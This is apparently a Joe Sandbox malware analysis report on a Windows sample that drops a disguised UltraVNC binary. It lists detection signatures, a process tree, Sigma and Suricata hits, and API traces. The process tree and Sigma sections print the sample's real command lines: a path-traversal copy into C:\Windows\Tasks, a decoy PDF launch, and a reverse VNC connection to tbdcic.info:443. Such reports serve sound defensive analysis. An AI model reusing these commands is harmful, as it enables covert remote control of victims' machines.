Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Olz7TmvkEW.exe

Overview

General Information

Sample name:Olz7TmvkEW.exe
renamed because original name is a hash value
Original sample name:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651.exe
Analysis ID:1579877
MD5:539b0fc32045de3013d00850827654aa
SHA1:eed973e0a66dab8e80a1403acd7beab580c34f94
SHA256:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651
Tags:exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • Olz7TmvkEW.exe (PID: 1240 cmdline: "C:\Users\user\Desktop\Olz7TmvkEW.exe" MD5: 539B0FC32045DE3013D00850827654AA)
    • cmd.exe (PID: 4460 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4828 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5472 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 2404 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 5628 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7328 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7608 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,1244757786394312861,11570424180585682022,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 6408 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 7424 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8012 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7560 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7424 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 2044 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 1532 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 1840 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 2156 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 8032 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7428 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 3652 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 924 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 6008 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Tasks\GIjul8.QTIrrrJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrrJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
      C:\Windows\Tasks\sync_browser.exeJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
          00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
            00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
              0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                  Click to see the 9 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  26.0.sync_browser.exe.7ff7e5070000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                    23.2.sync_browser.exe.7ff7e5070000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                      26.2.sync_browser.exe.7ff7e5070000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                        23.0.sync_browser.exe.7ff7e5070000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Execution from Suspicious Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5472, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 2044, ProcessName: sync_browser.exe
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5472, TargetFilename: C:\Windows\Tasks\conhost.exe
                          Sigma detected: Suspicious UltraVNC Execution
                          Source: Process startedAuthor: Bhabesh Raj: Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5472, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, ProcessId: 1840, ProcessName: sync_browser.exe
                          Sigma detected: Potential Command Line Path Traversal Evasion Attempt
                          Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Olz7TmvkEW.exe", ParentImage: C:\Users\user\Desktop\Olz7TmvkEW.exe, ParentProcessId: 1240, ParentProcessName: Olz7TmvkEW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 4460, ProcessName: cmd.exe
                          Sigma detected: Suspicious Copy From or To System Directory
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Olz7TmvkEW.exe", ParentImage: C:\Users\user\Desktop\Olz7TmvkEW.exe, ParentProcessId: 1240, ParentProcessName: Olz7TmvkEW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 4460, ProcessName: cmd.exe
                          Sigma detected: Suspicious Process Start Locations
                          Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5472, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 2044, ProcessName: sync_browser.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-23T13:39:02.527504+010020358931Malware Command and Control Activity Detected192.168.2.749918194.190.152.201443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                          Source: Olz7TmvkEW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: Binary string: conhost.pdbUGP source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmp, sdABZ4.E1924R.2.dr, sdABZ4.E1924R.0.dr, conhost.exe.6.dr
                          Source: Binary string: conhost.pdb source: Olz7TmvkEW.exe, 00000000.00000003.1297167688.000000000273D000.00000004.00000020.00020000.00000000.sdmp, sdABZ4.E1924R.2.dr, sdABZ4.E1924R.0.dr, conhost.exe.6.dr
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF7E5096DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5075910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF7E5075910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E512A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF7E512A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF7E509C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,26_2_00007FF7E5096DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5075910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,26_2_00007FF7E5075910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E512A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,26_2_00007FF7E512A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,26_2_00007FF7E509C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF7E5096DD1
                          Source: Network trafficSuricata IDS: 2035893 - Severity 1 - ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon : 192.168.2.7:49918 -> 194.190.152.201:443
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50DD890 EnterCriticalSection,LeaveCriticalSection,recv,WSAGetLastError,WSAGetLastError,LeaveCriticalSection,recv,WSAGetLastError,23_2_00007FF7E50DD890
                          Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                          Source: global trafficDNS traffic detected: DNS query: tbdcic.info
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                          Source: 77EC63BDA74BD0D0E0426DC8F80085060.12.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://forum.uvnc.com
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://ocsp.thawte.com0
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://www.uvnc.com
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
                          Source: 2D85F72862B55C4EADD9E66E06947F3D.12.drString found in binary or memory: http://x1.i.lencr.org/
                          Source: ReaderMessages.10.drString found in binary or memory: https://www.adobe.co
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Contains functionality to register a low level keyboard hook
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,000000000_2_00408630
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5071DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,23_2_00007FF7E5071DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5071DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,23_2_00007FF7E5071DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00007FF7E50A13A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5071DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,26_2_00007FF7E5071DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,26_2_00007FF7E50A13A0
